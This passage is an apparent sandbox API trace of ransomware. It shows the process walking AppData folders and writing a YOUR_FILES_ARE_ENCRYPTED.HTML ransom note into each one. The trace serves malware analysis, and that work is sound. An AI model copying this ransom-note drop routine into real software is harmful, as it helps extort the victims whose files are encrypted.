dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.055] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0123.055] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0123.055] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0123.055] GetProcessHeap () returned 0x600000 [0123.055] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\mmc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.056] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.058] CloseHandle (hObject=0x308) returned 1 [0123.058] GetProcessHeap () returned 0x600000 [0123.058] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.058] GetProcessHeap () returned 0x600000 [0123.058] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.058] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Network", cAlternateFileName="")) returned 1 [0123.058] StrStrIW (lpFirst="Network", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.058] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network") returned 59 [0123.058] GetProcessHeap () returned 0x600000 [0123.058] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0123.058] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network" [0123.058] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*" [0123.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0123.059] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.059] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0123.059] StrStrIW (lpFirst="Connections", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.059] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 71 [0123.059] GetProcessHeap () returned 0x600000 [0123.059] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0123.061] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0123.061] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0123.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0123.061] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="..", cAlternateFileName="")) returned 1 [0123.061] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="Pbk", cAlternateFileName="")) returned 1 [0123.061] StrStrIW (lpFirst="Pbk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.061] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 75 [0123.061] GetProcessHeap () returned 0x600000 [0123.061] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0123.062] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0123.062] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0123.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x6f4620, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.062] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x6f4620, cFileName="..", cAlternateFileName="")) returned 1 [0123.062] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x6f4620, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0123.062] StrStrIW (lpFirst="_hiddenPbk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.062] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 86 [0123.062] GetProcessHeap () returned 0x600000 [0123.062] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3340008 [0123.064] lstrcpyW (in: lpString1=0x3340008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0123.064] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0123.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0123.064] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName="..", cAlternateFileName="")) returned 1 [0123.064] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0123.064] StrStrIW (lpFirst="rasphone.pbk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.064] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 99 [0123.064] PathFindExtensionW (pszPath="rasphone.pbk") returned=".pbk" [0123.064] lstrlenW (lpString=".pbk") returned 4 [0123.064] PathFindExtensionW (pszPath="rasphone.pbk") returned=".pbk" [0123.064] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0123.064] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0123.064] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0123.064] GetProcessHeap () returned 0x600000 [0123.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0123.066] WriteFile (in: hFile=0x318, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0123.067] CloseHandle (hObject=0x318) returned 1 [0123.067] GetProcessHeap () returned 0x600000 [0123.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.067] GetProcessHeap () returned 0x600000 [0123.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.067] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x6f4620, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 0 [0123.067] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.067] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0123.067] GetProcessHeap () returned 0x600000 [0123.067] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0123.068] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0123.070] CloseHandle (hObject=0x320) returned 1 [0123.070] GetProcessHeap () returned 0x600000 [0123.070] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.070] GetProcessHeap () returned 0x600000 [0123.070] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0123.070] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="Pbk", cAlternateFileName="")) returned 0 [0123.070] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0123.070] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0123.070] GetProcessHeap () returned 0x600000 [0123.071] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\connections\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0123.072] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0123.073] CloseHandle (hObject=0x324) returned 1 [0123.073] GetProcessHeap () returned 0x600000 [0123.073] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.073] GetProcessHeap () returned 0x600000 [0123.073] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0123.075] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0123.075] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0123.075] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0123.075] GetProcessHeap () returned 0x600000 [0123.075] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.077] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.078] CloseHandle (hObject=0x308) returned 1 [0123.078] GetProcessHeap () returned 0x600000 [0123.078] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.078] GetProcessHeap () returned 0x600000 [0123.078] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.079] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Office", cAlternateFileName="")) returned 1 [0123.079] StrStrIW (lpFirst="Office", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.079] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office") returned 58 [0123.079] GetProcessHeap () returned 0x600000 [0123.079] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0123.080] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office" [0123.080] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*" [0123.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0123.082] FindNextFileW 